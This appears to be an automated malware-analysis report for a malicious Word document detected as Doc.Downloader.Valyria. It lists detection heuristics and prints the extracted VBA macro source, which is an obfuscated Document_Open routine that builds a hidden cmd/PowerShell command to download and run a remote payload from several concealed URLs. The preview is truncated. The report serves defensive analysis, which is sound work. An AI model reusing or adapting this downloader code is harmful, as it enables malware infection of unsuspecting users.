MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro that utilizes the Shell() function. This indicates an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Valyria-6691320-0' further supports its classification as a downloader. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Downloader.Valyria-6691320-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6691320-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6015 bytes |
SHA-256: b237b42aa2c9105f8dda32f5f1eea72414c5ae2955148e7a4b716ac6dd3dd68d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LCdjIIW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month CStr("R" + "zUj")
Month CStr("140" + "MPQqkaI")
Month CStr("sSSu" + "j")
Month CStr("o" + "UEbiZ" + "R" + "4139")
Month CStr("441945302" + "2900")
Month CStr("388371720" + "695" + "105043418" + "zb")
Shell CStr(ndjipooLRjNK) + CStr(BMqkYbj) + PFjfFz + kwWoaX + FlijFIh + CStr(OXmcpbwVtiac) + CStr(JZUnZOjmiv), CStr(vbHide)
Month CStr("LX" + "214366043")
Month CStr("UzHjTMKvZKU" + "37642150")
Month CStr("76747318" + "BJL")
Month CStr("oo" + "wt" + "432979750" + "351988251")
Month CStr("obl" + "b" + "rJMZ" + "9736")
End Sub
Attribute VB_Name = "wcPdiTaHDTSlW"
Function PFjfFz()
On _
Error _
Resume _
Next
Month CStr("S" + "LSdSB" + "355973887" + "KNXN")
Month CStr("WdzY" + "XkMzAq")
pVrSoS = Chr(17 + 3 + 13 + 12 + 54) + "md /V" + ":O/" + Chr(12 + 2 + 9 + 8 + 36) + Chr(5 + 1 + 4 + 3 + 21) + "^" + "se^t" + " Q^" + "B=" + " ^ ^" + " "
Month CStr("p" + "407925282" + "wNjzuFJiLDS" + "VsO")
Month CStr("334818110" + "cYPK" + "lDRUVN" + "FIqHl")
Month CStr("409302300" + "shfFZHP" + "oiwCzdb" + "432751672")
Month CStr("zdJjYFQPF" + "LbN")
Month CStr("4523" + "dEKswMpKKoKHOU" + "1933" + "9551")
fKJwftJN = " " + " ^ ^" + " ^" + " " + " }}^" + "{^h" + Chr(17 + 3 + 13 + 12 + 54) + "^t^a" + Chr(17 + 3 + 13 + 12 + 54) + "^}" + "^;^k^" + "a" + "er" + "^b;" + "S" + "^l" + Chr(12 + 2 + 9 + 8 + 36) + "$ "
Month CStr("iJwSp" + "420596873")
sKlia = "^m^" + "et^I-^e" + "ko" + "vnI;)" + "Sl" + Chr(12 + 2 + 9 + 8 + 36) + "$ " + "^,L^l^M"
Month CStr("6891" + "315506170" + "6065" + "432910823")
FEuGMjSQcN = "$(el^i" + "F" + "dao^l" + "nw" + "oD^." + "^fO^Q^" + "$" + "^" + "{" + "yr^t{)" + "^ALn" + "^$ n"
Month CStr("VSQodJu" + "jntvVq" + "PTEcZJYZV" + "SDinCtpiZ")
Month CStr("zhwUqtphmnGXZ" + "MZodztutLF" + "qiuDN" + "WCUTXiFTikoIi")
Month CStr("298656949" + "2780")
Month CStr("42986049" + "104341897")
bBqAGJ = "i" + " L" + "l^M$(h" + Chr(17 + 3 + 13 + 12 + 54) + "a^er" + "o^" + "f^;^" + "'e^"
Month CStr("5912" + "jQ" + "wVwAGWsE" + "1800")
lQocQfjIswG = "x^e^" + ".^'^+d" + "US^$^+'" + "\^'+" + Chr(17 + 3 + 13 + 12 + 54) + "i" + "^"
Month CStr("dZrjVFQovjJSJ" + "8849" + "kj" + "5648")
Month CStr("jmN" + "4794")
Month CStr("7293" + "193962747")
Month CStr("cMN" + "TzADUNBlATP")
lDzMMcj = "l^b" + "^u^p" + ":v" + "ne$=Sl" + Chr(12 + 2 + 9 + 8 + 36) + "$^;'" + "339^' "
Month CStr("UKmD" + "tVpjuXDhpFsi" + "kD" + "6597")
Month CStr("ipD" + "vB" + "129401791" + "uZTKVTJNzOasL")
rRJuhUjLC = "^=" + " d" + "^U^" + "S^" + "$;)^"
Month CStr("385519657" + "MIUi")
Month CStr("TYwEKb" + "AVzTwpVEtLWvik")
SkTnjTVO = "'^@^" + "'(t^i^l" + "^p^S.'B" + "^A9y" + "R2^s/^" + "ur.hs^"
Month CStr("438438974" + "9669")
Month CStr("IctrL" + "528476178" + "109330840" + "XzOFu")
iEzIznJOlM = "i^mi" + "/" + "/^:" + "^pt^t^" + "h^@Z^" + "Qf/^u" + "r" + "^" + ".m^b^s" + "^-t^" + "ev^s^"
PFjfFz = pVrSoS + fKJwftJN + sKlia + FEuGMjSQcN + bBqAGJ + lQocQfjIswG + lDzMMcj + rRJuhUjLC + SkTnjTVO + iEzIznJOlM
Month CStr("iP" + "scYPMkrTw" + "5109" + "9847")
Month CStr("8554" + "201960050" + "PvPPoc" + "354037052")
End Function
Function kwWoaX()
On _
Error _
Resume _
Next
Month CStr("J" + "Ww")
Month CStr("NPm" + "j")
Month CStr("vrCX" + "107474268" + "dpj" + "5616")
Month CStr("PKh" + "2446" + "7103" + "8796")
zIlNsZwN = "s^ar/" + "/:^p^" + "t" + "t^h@GR" + "VV" + "lVH4/" + "ri^.dij" + "^a^mn^a" + "re^f^" + "az" + "//^:" + "^p" + "^t^t^"
Month CStr("XnHjMo" + "GcS" + "398586780" + "6736")
Month CStr("7029" + "hl" + "4711" + "2253")
tZaqkLiXtuh = "h@" + "S" + "7/m^o" + Chr(17 + 3 + 13 + 12 + 54) + ".s^o" + Chr(17 + 3 + 13 + 12 + 54) + "n" + "e^m" + "a^l^" + "fer" + "^" + "tn^e
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.